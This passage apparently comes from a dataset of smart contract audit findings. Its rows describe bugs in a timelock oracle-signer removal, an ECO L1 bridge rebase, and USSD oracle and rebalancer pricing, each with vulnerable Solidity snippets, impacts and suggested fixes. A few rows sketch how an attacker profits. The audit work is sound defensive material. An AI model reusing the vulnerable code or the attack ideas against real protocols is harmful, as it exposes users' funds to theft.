First function `signalRemoveOracleSigner` is called by the TimelockAdmin which stores a time-delayed timestamp corresponding to the keccak256 hash of (""removeOracleSigner"", account) - a bytes32 value called actionKey in the pendingActions mapping.\\nThen the Admin needs to call function `removeOracleSignerAfterSignal` but this function calls `_addOracleSignerActionKey` instead of `_removeOracleSignerActionKey` for calculating the bytes32 action key value. Now the actionKey is calculated as keccak256 hash of (""addOracleSigner"", account) and this hash is used for checking if this action is actually pending by ensuring its timestamp is not zero inside the `_validateAction` function called via `_validateAndClearAction` function at Line 122. The hash of (""removeOracleSigner"", account) can never match hash of (""addOracleSigner"", account) and thus this validation will fail.\\n```\\n function removeOracleSignerAfterSignal(address account) external onlyTimelockAdmin nonReentrant {\\n bytes32 actionKey = _addOracleSignerActionKey(account);\\n _validateAndClearAction(actionKey, ""removeOracleSigner"");\\n\\n oracleStore.removeSigner(account);\\n\\n EventUtils.EventLogData memory eventData;\\n eventData.addressItems.initItems(1);\\n eventData.addressItems.setItem(0, ""account"", account);\\n eventEmitter.emitEventLog1(\\n ""RemoveOracleSigner"",\\n actionKey,\\n eventData\\n );\\n }\\n```\\n",Replace the call to _addOracleSignerActionKey at Line 118 by call to _removeOracleSignerActionKey,"The process of removing an Oracle Signer will always revert and this breaks an important safety measure if a certain oracle signer becomes malicious the TimelockAdmin could do nothing(these functions are meant for this). 
Hence, important functionality is permanently broken.","```\\n function removeOracleSignerAfterSignal(address account) external onlyTimelockAdmin nonReentrant {\\n bytes32 actionKey = _addOracleSignerActionKey(account);\\n _validateAndClearAction(actionKey, ""removeOracleSigner"");\\n\\n oracleStore.removeSigner(account);\\n\\n EventUtils.EventLogData memory eventData;\\n eventData.addressItems.initItems(1);\\n eventData.addressItems.setItem(0, ""account"", account);\\n eventEmitter.emitEventLog1(\\n ""RemoveOracleSigner"",\\n actionKey,\\n eventData\\n );\\n }\\n```\\n" +Stale inflationMultiplier in L1ECOBridge,high,"`L1ECOBridge::inflationMultiplier` is updated through `L1ECOBridge::rebase` on Ethereum, and it is used in `_initiateERC20Deposit` and `finalizeERC20Withdrawal` to convert between token amount and `_gonsAmount`. However, if `rebase` is not called in a timely manner, the `inflationMultiplier` value can be stale and inconsistent with the value of L1 ECO token during transfer, leading to incorrect token amounts in deposit and withdraw.\\nThe `inflationMultiplier` value is updated in `rebase` with an independent transaction on L1 as shown below:\\n```\\n function rebase(uint32 _l2Gas) external {\\n inflationMultiplier = IECO(l1Eco).getPastLinearInflation(block.number);\\n```\\n\\nHowever, in both `_initiateERC20Deposit`, `transferFrom` is called before the `inflationMultiplier` is used, which can lead to inconsistent results if `rebase` is not called on time for the `inflationMultiplier` to be updated. The code snippet for `_initiateERC20Deposit` is as follows:\\n```\\n IECO(_l1Token).transferFrom(_from, address(this), _amount);\\n _amount = _amount * inflationMultiplier;\\n```\\n\\n`finalizeERC20Withdrawal` has the same problem.\\n```\\n uint256 _amount = _gonsAmount / inflationMultiplier;\\n bytes memory _ecoTransferMessage = abi.encodeWithSelector(IERC20.transfer.selector,_to,_amount);\\n```\\n\\nThe same problem does not exist in L2ECOBridge. 
Because the L2 rebase function updates inflationMultiplier and rebases the l2Eco token synchronously.\\n```\\n function rebase(uint256 _inflationMultiplier)\\n external\\n virtual\\n onlyFromCrossDomainAccount(l1TokenBridge)\\n validRebaseMultiplier(_inflationMultiplier)\\n {\\n inflationMultiplier = _inflationMultiplier;\\n l2Eco.rebase(_inflationMultiplier);\\n emit RebaseInitiated(_inflationMultiplier);\\n }\\n```\\n",Calling `IECO(l1Eco).getPastLinearInflation(block.number)` instead of using `inflationMultiplier`.,The attacker can steal tokens with this.\\nHe can deposit to L1 bridge when he observes a stale larger value and he will receive more tokens on L2.,```\\n function rebase(uint32 _l2Gas) external {\\n inflationMultiplier = IECO(l1Eco).getPastLinearInflation(block.number);\\n```\\n +Malicious actor cause rebase to an old inflation multiplier,high,"The protocol has a rebasing mechanism that allows syncing the inflation multiplier between both L1 and L2 chains. The call to rebase is permissionless (anyone can trigger it). Insufficient checks allow a malicious actor to rebase to an old value.\\n```\\n function rebase(uint32 _l2Gas) external {\\n inflationMultiplier = IECO(l1Eco).getPastLinearInflation(\\n block.number\\n );\\n\\n bytes memory message = abi.encodeWithSelector(\\n IL2ECOBridge.rebase.selector,\\n inflationMultiplier\\n );\\n\\n sendCrossDomainMessage(l2TokenBridge, _l2Gas, message);\\n }\\n```\\n\\nA malicious actor can call this function a large amount of times to queue messages on `L2CrossDomainMessenger`. Since it is expensive to execute so many messages from `L2CrossDomainMessenger` (especially if the malicious actor sets `_l2Gas` to a high value) there will be a rebase message that will not be relayed through `L2CrossDomainMessenger` (or in failedMessages array).\\nSome time passes and other legitimate rebase transactions get executed.
The attacker will debalance the scales between L1 and L2 and can profit from it.","When sending a rebase from L1, include in the message the L1 block number. In L2 rebase, validate that the new rebase block number is above previous block number",debalance the scales between L1 and L2 ECO token,"```\\n function rebase(uint32 _l2Gas) external {\\n inflationMultiplier = IECO(l1Eco).getPastLinearInflation(\\n block.number\\n );\\n\\n bytes memory message = abi.encodeWithSelector(\\n IL2ECOBridge.rebase.selector,\\n inflationMultiplier\\n );\\n\\n sendCrossDomainMessage(l2TokenBridge, _l2Gas, message);\\n }\\n```\\n" +`StableOracleDAI` calculates `getPriceUSD` with inverted base/rate tokens for Chainlink price,high,"`StableOracleDAI::getPriceUSD()` calculates the average price between the Uniswap pool price for a pair and the Chainlink feed as part of its result.\\nThe problem is that it uses `WETH/DAI` as the base/rate tokens for the pool, and `DAI/ETH` for the Chainlink feed, which is the opposite.\\nThis will incur in a huge price difference that will impact on the amount of USSD tokens being minted, while requesting the price from this oracle.\\nIn `StableOracleDAI::getPrice()` the `price` from the Chainlink feed `priceFeedDAIETH` returns the `price` as DAI/ETH.\\nThis can be checked on Etherscan and the Chainlink Feeds Page.\\nAlso note the comment on the code is misleading, as it is refering to another pair:\\nchainlink price data is 8 decimals for WETH/USD\\n```\\n/// constructor\\n priceFeedDAIETH = AggregatorV3Interface(\\n 0x773616E4d11A78F511299002da57A0a94577F1f4\\n );\\n\\n/// getPrice()\\n // chainlink price data is 8 decimals for WETH/USD, so multiply by 10 decimals to get 18 decimal fractional\\n //(uint80 roundID, int256 price, uint256 startedAt, uint256 timeStamp, uint80 answeredInRound) = priceFeedDAIETH.latestRoundData();\\n (, int256 price, , , ) = priceFeedDAIETH.latestRoundData();\\n```\\n\\nLink to code\\nOn the other hand, the price coming from 
the Uniswap pool `DAIWethPrice` returns the price as `WETH/DAI`.\\nNote that the relation WETH/DAI is given by the orders of the token addresses passed as arguments, being the first the base token, and the second the quote token.\\nAlso note that the variable name `DAIWethPrice` is misleading as well as the base/rate are the opposite (although this doesn't affect the code).\\n```\\n uint256 DAIWethPrice = DAIEthOracle.quoteSpecificPoolsWithTimePeriod(\\n 1000000000000000000, // 1 Eth\\n 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, // WETH (base token) // @audit\\n 0x6B175474E89094C44Da98b954EedeAC495271d0F, // DAI (quote token) // @audit\\n pools, // DAI/WETH pool uni v3\\n 600 // period\\n );\\n```\\n\\nLink to code\\nFinally, both values are used to calculate an average price of in `((DAIWethPrice + uint256(price) * 1e10) / 2)`.\\nBut as seen, one has price in `DAI/ETH` and the other one in `WETH/DAI`, which leads to an incorrect result.\\n```\\n return\\n (wethPriceUSD * 1e18) /\\n ((DAIWethPrice + uint256(price) * 1e10) / 2);\\n```\\n\\nLink to code\\nThe average will be lower in this case, and the resulting price higher.\\nThis will be used by `USSD::mintForToken()` for calculating the amount of tokens to mint for the user, and thus giving them much more than they should.\\nAlso worth mentioning that `USSDRebalancer::rebalance()` also relies on the result of this price calculation and will make it perform trades with incorrect values.","Calculate the inverse of the `price` returned by the Chainlink feed so that it can be averaged with the pool `price`, making sure that both use the correct `WETH/DAI` and `ETH/DAI` base/rate tokens.","Users will receive far more USSD tokens than they should when they call `mintForToken()`, ruining the token value.\\nWhen performed the `USSDRebalancer::rebalance()`, all the calculations will be broken for the DAI oracle, leading to incorrect pool trades due to the error in `getPrice()`","```\\n/// constructor\\n priceFeedDAIETH = 
AggregatorV3Interface(\\n 0x773616E4d11A78F511299002da57A0a94577F1f4\\n );\\n\\n/// getPrice()\\n // chainlink price data is 8 decimals for WETH/USD, so multiply by 10 decimals to get 18 decimal fractional\\n //(uint80 roundID, int256 price, uint256 startedAt, uint256 timeStamp, uint80 answeredInRound) = priceFeedDAIETH.latestRoundData();\\n (, int256 price, , , ) = priceFeedDAIETH.latestRoundData();\\n```\\n" +`USSDRebalancer.sol#SellUSSDBuyCollateral` the check of whether collateral is DAI is wrong,high,"The `SellUSSDBuyCollateral` function uses `||` instead of `&&` to check whether the collateral is DAI. It is wrong and may cause the `SellUSSDBuyCollateral` function to revert.\\n```\\n196 for (uint256 i = 0; i < collateral.length; i++) {\\n197 uint256 collateralval = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * 1e18 / (10**IERC20MetadataUpgradeable(collateral[i].token).decimals()) * collateral[i].oracle.getPriceUSD() / 1e18;\\n198 if (collateralval * 1e18 / ownval < collateral[i].ratios[flutter]) {\\n199 if (collateral[i].token != uniPool.token0() || collateral[i].token != uniPool.token1()) {\\n200 // don't touch DAI if it's needed to be bought (it's already bought)\\n201 IUSSD(USSD).UniV3SwapInput(collateral[i].pathbuy, daibought/portions);\\n202 }\\n203 }\\n204 }\\n```\\n\\nLine 199 should use `&&` instead of `||` to ensure that the token is not DAI.
If the token is DAI, the `UniV3SwapInput` function will revert because that DAI's `pathbuy` is empty.","```\\n for (uint256 i = 0; i < collateral.length; i// Add the line below\\n// Add the line below\\n) {\\n uint256 collateralval = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * 1e18 / (10**IERC20MetadataUpgradeable(collateral[i].token).decimals()) * collateral[i].oracle.getPriceUSD() / 1e18;\\n if (collateralval * 1e18 / ownval < collateral[i].ratios[flutter]) {\\n// Remove the line below\\n if (collateral[i].token != uniPool.token0() || collateral[i].token != uniPool.token1()) {\\n// Add the line below\\n if (collateral[i].token != uniPool.token0() && collateral[i].token != uniPool.token1()) {\\n // don't touch DAI if it's needed to be bought (it's already bought)\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathbuy, daibought/portions);\\n }\\n }\\n }\\n```\\n",The `SellUSSDBuyCollateral` will revert and USSD will become unstable.,"```\\n196 for (uint256 i = 0; i < collateral.length; i++) {\\n197 uint256 collateralval = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * 1e18 / (10**IERC20MetadataUpgradeable(collateral[i].token).decimals()) * collateral[i].oracle.getPriceUSD() / 1e18;\\n198 if (collateralval * 1e18 / ownval < collateral[i].ratios[flutter]) {\\n199 if (collateral[i].token != uniPool.token0() || collateral[i].token != uniPool.token1()) {\\n200 // don't touch DAI if it's needed to be bought (it's already bought)\\n201 IUSSD(USSD).UniV3SwapInput(collateral[i].pathbuy, daibought/portions);\\n202 }\\n203 }\\n204 }\\n```\\n" +The getOwnValuation() function contains errors in the price calculation,high,"The getOwnValuation() function in the provided code has incorrect price calculation logic when token0() or token1() is equal to USSD. The error leads to inaccurate price calculations.\\nThe `USSDRebalancer.getOwnValuation()` function calculates the price based on the sqrtPriceX96 value obtained from the uniPool.slot0() function. 
The calculation depends on whether token0() is equal to USSD or not. If token0() is equal to USSD, the price calculation is performed as follows:\\n```\\n price = uint(sqrtPriceX96)*(uint(sqrtPriceX96))/(1e6) >> (96 * 2);\\n```\\n\\nHowever, there is an error in the price calculation logic. The calculation should be:\\n```\\nprice = uint(sqrtPriceX96) * uint(sqrtPriceX96) * 1e6 >> (96 * 2);\\n```\\n\\nIf token0() is not equal to USSD, the price calculation is slightly different:\\n```\\n price = uint(sqrtPriceX96)*(uint(sqrtPriceX96))*(1e18 /* 1e12 + 1e6 decimal representation */) >> (96 * 2);\\n // flip the fraction\\n price = (1e24 / price) / 1e12;\\n```\\n\\nThe calculation should be:\\n```\\n price = uint(sqrtPriceX96)*(uint(sqrtPriceX96))*(1e6 /* 1e12 + 1e6 decimal representation */) >> (96 * 2);\\n // flip the fraction\\n price = (1e24 / price) / 1e12;\\n```\\n","When token0() is USSD, the correct calculation should be uint(sqrtPriceX96) * uint(sqrtPriceX96) * 1e6 >> (96 * 2). When token1() is USSD, the correct calculation should be\\n```\\nprice = uint(sqrtPriceX96)*(uint(sqrtPriceX96))*(1e6 /* 1e12 + 1e6 decimal representation */) >> (96 * 2);\\n // flip the fraction\\n price = (1e24 / price) / 1e12;\\n```\\n","
The inaccurate prices can result in incorrect asset valuations, which may affect trading decisions, liquidity provision, and overall financial calculations based on the UniSwap V3 pool.",```\\n price = uint(sqrtPriceX96)*(uint(sqrtPriceX96))/(1e6) (96 * 2);\\n```\\n +The price from `StableOracleDAI` is returned with the incorrect number of decimals,high,"The price returned from the `getPriceUSD` function of the `StableOracleDAI` is scaled up by `1e10`, which results in 28 decimals instead of the intended 18.\\nIn `StableOracleDAI` the `getPriceUSD` function is defined as follows...\\n```\\n function getPriceUSD() external view override returns (uint256) {\\n address[] memory pools = new address[](1);\\n pools[0] = 0x60594a405d53811d3BC4766596EFD80fd545A270;\\n uint256 DAIWethPrice = DAIEthOracle.quoteSpecificPoolsWithTimePeriod(\\n 1000000000000000000, // 1 Eth\\n 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, // WETH (base token)\\n 0x6B175474E89094C44Da98b954EedeAC495271d0F, // DAI (quote token)\\n pools, // DAI/WETH pool uni v3\\n 600 // period\\n );\\n\\n uint256 wethPriceUSD = ethOracle.getPriceUSD();\\n\\n // chainlink price data is 8 decimals for WETH/USD, so multiply by 10 decimals to get 18 decimal fractional\\n //(uint80 roundID, int256 price, uint256 startedAt, uint256 timeStamp, uint80 answeredInRound) = priceFeedDAIETH.latestRoundData();\\n (, int256 price,,,) = priceFeedDAIETH.latestRoundData();\\n\\n return (wethPriceUSD * 1e18) / ((DAIWethPrice + uint256(price) * 1e10) / 2);\\n }\\n```\\n\\nThe assumption is made that the `DAIWethPrice` is 8 decimals, and is therefore multiplied by `1e10` in the return statement to scale it up to 18 decimals.\\nThe other price feeds used in the protocol are indeed received with decimals, however, the Chainlink DAI/ETH price feed returns a value with 18 decimals as can be seen on their site.",Remove the `* 1e10` from the return statement.\\n```\\n// Remove the line below\\n return (wethPriceUSD * 1e18) / ((DAIWethPrice 
// Add the line below\\n uint256(price) * 1e10) / 2);\\n// Add the line below\\n return (wethPriceUSD * 1e18) / (DAIWethPrice // Add the line below\\n uint256(price) / 2);\\n```\\n,"This means that the price returned from the `getPriceUSD` function is scaled up by `1e10`, which results in 28 decimals instead of the intended 18, drastically overvaluing the DAI/USD price.\\nThis will result in the USSD token price being a tiny fraction of what it is intended to be. Instead of being pegged to $1, it will be pegged to $0.0000000001, completely defeating the purpose of the protocol.\\nFor example, if a user calls `USSD.mintForToken`, supplying DAI, they'll be able to mint `1e10` times more USSD than intended.","```\\n function getPriceUSD() external view override returns (uint256) {\\n address[] memory pools = new address[](1);\\n pools[0] = 0x60594a405d53811d3BC4766596EFD80fd545A270;\\n uint256 DAIWethPrice = DAIEthOracle.quoteSpecificPoolsWithTimePeriod(\\n 1000000000000000000, // 1 Eth\\n 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, // WETH (base token)\\n 0x6B175474E89094C44Da98b954EedeAC495271d0F, // DAI (quote token)\\n pools, // DAI/WETH pool uni v3\\n 600 // period\\n );\\n\\n uint256 wethPriceUSD = ethOracle.getPriceUSD();\\n\\n // chainlink price data is 8 decimals for WETH/USD, so multiply by 10 decimals to get 18 decimal fractional\\n //(uint80 roundID, int256 price, uint256 startedAt, uint256 timeStamp, uint80 answeredInRound) = priceFeedDAIETH.latestRoundData();\\n (, int256 price,,,) = priceFeedDAIETH.latestRoundData();\\n\\n return (wethPriceUSD * 1e18) / ((DAIWethPrice + uint256(price) * 1e10) / 2);\\n }\\n```\\n" +Wrong computation of the amountToSellUnit variable,high,The variable `amountToSellUnits` is computed wrongly in the code which will lead to an incorrect amount of collateral to be sold.\\nThe `BuyUSSDSellCollateral()` function is used to sell collateral during a peg-down recovery event. 
The computation of the amount to sell is computed using the following formula:\\n```\\n// @audit-issue Wrong computation\\nuint256 amountToSellUnits = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * ((amountToBuyLeftUSD * 1e18 / collateralval) / 1e18) / 1e18;\\n```\\n\\nThe idea is to sell an amount which is equivalent (in USD) to the ratio of `amountToBuyLeftUSD / collateralval`. Flattening the equation it ends up as:\\n```\\nuint256 amountToSellUnits = (collateralBalance * amountToBuyLeftUSD * 1e18) / (collateralval * 1e18 * 1e18);\\n\\n// Reducing the equation\\nuint256 amountToSellUnits = (collateralBalance * amountToBuyLeftUSD) / (collateralval * 1e18);\\n```\\n\\n`amountToBuyLeftUSD` and `collateralval` already have 18 decimals so their decimals get cancelled together which will lead the last 1e18 factor as not necessary.,Issue Wrong computation of the amountToSellUnit variable\\nDelete the last 1e18 factor,The contract will sell an incorrect amount of collateral during a peg-down recovery event.,```\\n// @audit-issue Wrong computation\\nuint256 amountToSellUnits = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * ((amountToBuyLeftUSD * 1e18 / collateralval) / 1e18) / 1e18;\\n```\\n +Calls to Oracles don't check for stale prices,medium,"Calls to Oracles don't check for stale prices.\\nNone of the oracle calls check for stale prices, for example StableOracleDAI.getPriceUSD():\\n```\\n(, int256 price, , , ) = priceFeedDAIETH.latestRoundData();\\n\\nreturn\\n (wethPriceUSD * 1e18) /\\n ((DAIWethPrice + uint256(price) * 1e10) / 2);\\n```\\n","Read the `updatedAt` parameter from the calls to `latestRoundData()` and verify that it isn't older than a set amount, eg:\\n```\\nif (updatedAt < block.timestamp - 60 * 60 /* 1 hour */) {\\n revert(""stale price feed"");\\n}\\n```\\n",Oracle price feeds can become stale due to a variety of reasons. 
Using a stale price will result in incorrect calculations in most of the key functionality of USSD & USSDRebalancer contracts.,"```\\n(, int256 price, , , ) = priceFeedDAIETH.latestRoundData();\\n\\nreturn\\n (wethPriceUSD * 1e18) /\\n ((DAIWethPrice + uint256(price) * 1e10) / 2);\\n```\\n" +"rebalance process incase of selling the collateral, could revert because of underflow calculation",medium,"rebalance process, will try to sell the collateral in case of peg-down. However, the process can revert because the calculation can underflow.\\nInside `rebalance()` call, if `BuyUSSDSellCollateral()` is triggered, it will try to sell the current collateral to `baseAsset`. The asset that will be sold (amountToSellUnits) first calculated. Then swap it to `baseAsset` via uniswap. However, when subtracting `amountToBuyLeftUSD`, it with result of `(IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore)`. There is no guarantee `amountToBuyLeftUSD` always bigger than `(IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore)`.\\nThis causing the call could revert in case `(IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore)` > `amountToBuyLeftUSD`.\\nThere are two branch where `amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore)` is performed :\\nIncase `collateralval > amountToBuyLeftUSD`\\n`collateralval` is calculated using oracle price, thus the result of swap not guaranteed to reflect the proportion of `amountToBuyLefUSD` against `collateralval` ratio, and could result in returning `baseAsset` larger than expected. 
And potentially `(IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore)` > `amountToBuyLeftUSD`\\n```\\n uint256 collateralval = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * 1e18 / (10**IERC20MetadataUpgradeable(collateral[i].token).decimals()) * collateral[i].oracle.getPriceUSD() / 1e18;\\n if (collateralval > amountToBuyLeftUSD) {\\n // sell a portion of collateral and exit\\n if (collateral[i].pathsell.length > 0) {\\n uint256 amountBefore = IERC20Upgradeable(baseAsset).balanceOf(USSD);\\n uint256 amountToSellUnits = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * ((amountToBuyLeftUSD * 1e18 / collateralval) / 1e18) / 1e18;\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathsell, amountToSellUnits);\\n amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n DAItosell += (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n } else {\\n```\\n\\nIncase `collateralval < amountToBuyLeftUSD`\\nThis also can't guarantee `(IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore)` < `amountToBuyLeftUSD`.\\n```\\n if (collateralval >= amountToBuyLeftUSD / 20) {\\n uint256 amountBefore = IERC20Upgradeable(baseAsset).balanceOf(USSD);\\n // sell all collateral and move to next one\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathsell, IERC20Upgradeable(collateral[i].token).balanceOf(USSD));\\n amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n DAItosell += (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n }\\n```\\n","Check if `(IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore)` > `amountToBuyLeftUSD`, in that case, just set `amountToBuyLeftUSD` to 0.\\n```\\n // rest of code\\n uint baseAssetChange = IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n if (baseAssetChange > amountToBuyLeftUSD) {\\n amountToBuyLeftUSD = 0;\\n } else {\\n amountToBuyLeftUSD -= baseAssetChange;\\n }\\n DAItosell += baseAssetChange;\\n // rest of 
code\\n```\\n",Rebalance process can revert caused by underflow calculation.,"```\\n uint256 collateralval = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * 1e18 / (10**IERC20MetadataUpgradeable(collateral[i].token).decimals()) * collateral[i].oracle.getPriceUSD() / 1e18;\\n if (collateralval > amountToBuyLeftUSD) {\\n // sell a portion of collateral and exit\\n if (collateral[i].pathsell.length > 0) {\\n uint256 amountBefore = IERC20Upgradeable(baseAsset).balanceOf(USSD);\\n uint256 amountToSellUnits = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * ((amountToBuyLeftUSD * 1e18 / collateralval) / 1e18) / 1e18;\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathsell, amountToSellUnits);\\n amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n DAItosell += (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n } else {\\n```\\n" +StableOracleWBTC use BTC/USD chainlink oracle to price WBTC which is problematic if WBTC depegs,medium,"The StableOracleWBTC contract utilizes a BTC/USD Chainlink oracle to determine the price of WBTC. However, this approach can lead to potential issues if WBTC were to depeg from BTC. In such a scenario, WBTC would no longer maintain an equivalent value to BTC. This can result in significant problems, including borrowing against a devalued asset and the accumulation of bad debt. Given that the protocol continues to value WBTC based on BTC/USD, the issuance of bad loans would persist, exacerbating the overall level of bad debt.\\nImportant to note that this is like a 2 in 1 report as the same idea could work on the StableOracleWBGL contract too.\\nThe vulnerability lies in the reliance on a single BTC/USD Chainlink oracle to obtain the price of WBTC. If the bridge connecting WBTC to BTC becomes compromised and WBTC depegs, WBTC may depeg from BTC. Consequently, WBTC's value would no longer be equivalent to BTC, potentially rendering it worthless (hopefully this never happens). 
The use of the BTC/USD oracle to price WBTC poses risks to the protocol and its users.\\nThe following code snippet represents the relevant section of the StableOracleWBTC contract responsible for retrieving the price of WBTC using the BTC/USD Chainlink oracle:\\n```\\ncontract StableOracleWBTC is IStableOracle {\\n AggregatorV3Interface priceFeed;\\n\\n constructor() {\\n priceFeed = AggregatorV3Interface(\\n 0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419\\n\\n );\\n }\\n\\n function getPriceUSD() external view override returns (uint256) {\\n (, int256 price, , , ) = priceFeed.latestRoundData();\\n // chainlink price data is 8 decimals for WBTC/USD\\n return uint256(price) * 1e10;\\n }\\n}\\n```\\n\\nNB: key to note that the above pricefeed is set to the wrong aggregator, the correct one is this: `0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599`","To mitigate the vulnerability mentioned above, it is strongly recommended to implement a double oracle setup for WBTC pricing. This setup would involve integrating both the BTC/USD Chainlink oracle and an additional on-chain liquidity-based oracle, such as UniV3 TWAP.\\nThe double oracle setup serves two primary purposes. Firstly, it reduces the risk of price manipulation by relying on the Chainlink oracle, which ensures accurate pricing for WBTC. Secondly, incorporating an on-chain liquidity-based oracle acts as a safeguard against WBTC depegging. By monitoring the price derived from the liquidity-based oracle and comparing it to the Chainlink oracle's price, borrowing activities can be halted if the threshold deviation (e.g., 2% lower) is breached.\\nAdopting a double oracle setup enhances the protocol's stability and minimizes the risks associated with WBTC depegging. It ensures accurate valuation, reduces the accumulation of bad debt, and safeguards the protocol and its users","Should the WBTC bridge become compromised or WBTC depeg from BTC, the protocol would face severe consequences. 
The protocol would be burdened with a substantial amount of bad debt stemming from outstanding loans secured by WBTC. Additionally, due to the protocol's reliance on the BTC/USD oracle, the issuance of loans against WBTC would persist even if its value has significantly deteriorated. This would lead to an escalation in bad debt, negatively impacting the protocol's financial stability and overall performance.","```\\ncontract StableOracleWBTC is IStableOracle {\\n AggregatorV3Interface priceFeed;\\n\\n constructor() {\\n priceFeed = AggregatorV3Interface(\\n 0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419\\n\\n );\\n }\\n\\n function getPriceUSD() external view override returns (uint256) {\\n (, int256 price, , , ) = priceFeed.latestRoundData();\\n // chainlink price data is 8 decimals for WBTC/USD\\n return uint256(price) * 1e10;\\n }\\n}\\n```\\n" +Inaccurate collateral factor calculation due to missing collateral asset,medium,"The function `collateralFactor()` in the smart contract calculates the collateral factor for the protocol but fails to account for the removal of certain collateral assets. As a result, the total value of the removed collateral assets is not included in the calculation, leading to an inaccurate collateral factor.\\nThe `collateralFactor()` function calculates the current collateral factor for the protocol. It iterates through each collateral asset in the system and calculates the total value of all collateral assets in USD.\\nFor each collateral asset, the function retrieves its balance and converts it to a USD value by multiplying it with the asset's price in USD obtained from the corresponding oracle. The balance is adjusted for the decimal precision of the asset. 
These USD values are accumulated to calculate the totalAssetsUSD.\\n```\\n function collateralFactor() public view override returns (uint256) {\\n uint256 totalAssetsUSD = 0;\\n for (uint256 i = 0; i < collateral.length; i++) {\\n totalAssetsUSD +=\\n (((IERC20Upgradeable(collateral[i].token).balanceOf(\\n address(this)\\n ) * 1e18) /\\n (10 **\\n IERC20MetadataUpgradeable(collateral[i].token)\\n .decimals())) *\\n collateral[i].oracle.getPriceUSD()) /\\n 1e18;\\n }\\n\\n return (totalAssetsUSD * 1e6) / totalSupply();\\n }\\n```\\n\\nHowever, when a collateral asset is removed from the collateral list, the `collateralFactor` function fails to account for its absence. This results in an inaccurate calculation of the collateral factor. Specifically, the totalAssetsUSD variable does not include the value of the removed collateral asset, leading to an underestimation of the total collateral value. The function `SellUSSDBuyCollateral()` in the smart contract is used for rebalancing. However, it relies on the `collateralFactor` calculation, which has been found to be inaccurate. The `collateralFactor` calculation does not accurately assess the portions of collateral assets to be bought or sold during rebalancing. 
This discrepancy can lead to incorrect rebalancing decisions and potentially impact the stability and performance of the protocol.\\n```\\n function removeCollateral(uint256 _index) public onlyControl {\\n collateral[_index] = collateral[collateral.length - 1];\\n collateral.pop();\\n }\\n```\\n",Ensure accurate calculations and maintain the integrity of the collateral factor metric in the protocol's risk management system.,"As a consequence, the reported collateral factor may be lower than it should be, potentially affecting the risk assessment and stability of the protocol.",```\\n function collateralFactor() public view override returns (uint256) {\\n uint256 totalAssetsUSD = 0;\\n for (uint256 i = 0; i < collateral.length; i++) {\\n totalAssetsUSD +=\\n (((IERC20Upgradeable(collateral[i].token).balanceOf(\\n address(this)\\n ) * 1e18) /\\n (10 **\\n IERC20MetadataUpgradeable(collateral[i].token)\\n .decimals())) *\\n collateral[i].oracle.getPriceUSD()) /\\n 1e18;\\n }\\n\\n return (totalAssetsUSD * 1e6) / totalSupply();\\n }\\n```\\n +Inconsistency handling of DAI as collateral in the BuyUSSDSellCollateral function,medium,"DAI is the base asset of the `USSD.sol` contract, when a rebalacing needs to occur during a peg-down recovery, collateral is sold for DAI, which then is used to buy USSD in the DAI / USSD uniswap pool. 
Hence, when DAI is the collateral, this is not sold because there does not exist a path to sell DAI for DAI.\\nThe above behavior is handled when collateral is about to be sold for DAI, see the comment `no need to swap DAI` (link to the code):\\n```\\nif (collateralval > amountToBuyLeftUSD) {\\n // sell a portion of collateral and exit\\n if (collateral[i].pathsell.length > 0) {\\n uint256 amountBefore = IERC20Upgradeable(baseAsset).balanceOf(USSD);\\n uint256 amountToSellUnits = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * ((amountToBuyLeftUSD * 1e18 / collateralval) / 1e18) / 1e18;\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathsell, amountToSellUnits);\\n amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n DAItosell += (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n } \\n else {\\n // no need to swap DAI\\n DAItosell = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * amountToBuyLeftUSD / collateralval;\\n }\\n}\\n\\nelse {\\n // @audit-issue Not handling the case where this is DAI as is done above.\\n // sell all or skip (if collateral is too little, 5% treshold)\\n if (collateralval >= amountToBuyLeftUSD / 20) {\\n uint256 amountBefore = IERC20Upgradeable(baseAsset).balanceOf(USSD);\\n // sell all collateral and move to next one\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathsell, IERC20Upgradeable(collateral[i].token).balanceOf(USSD));\\n amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n DAItosell += (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n 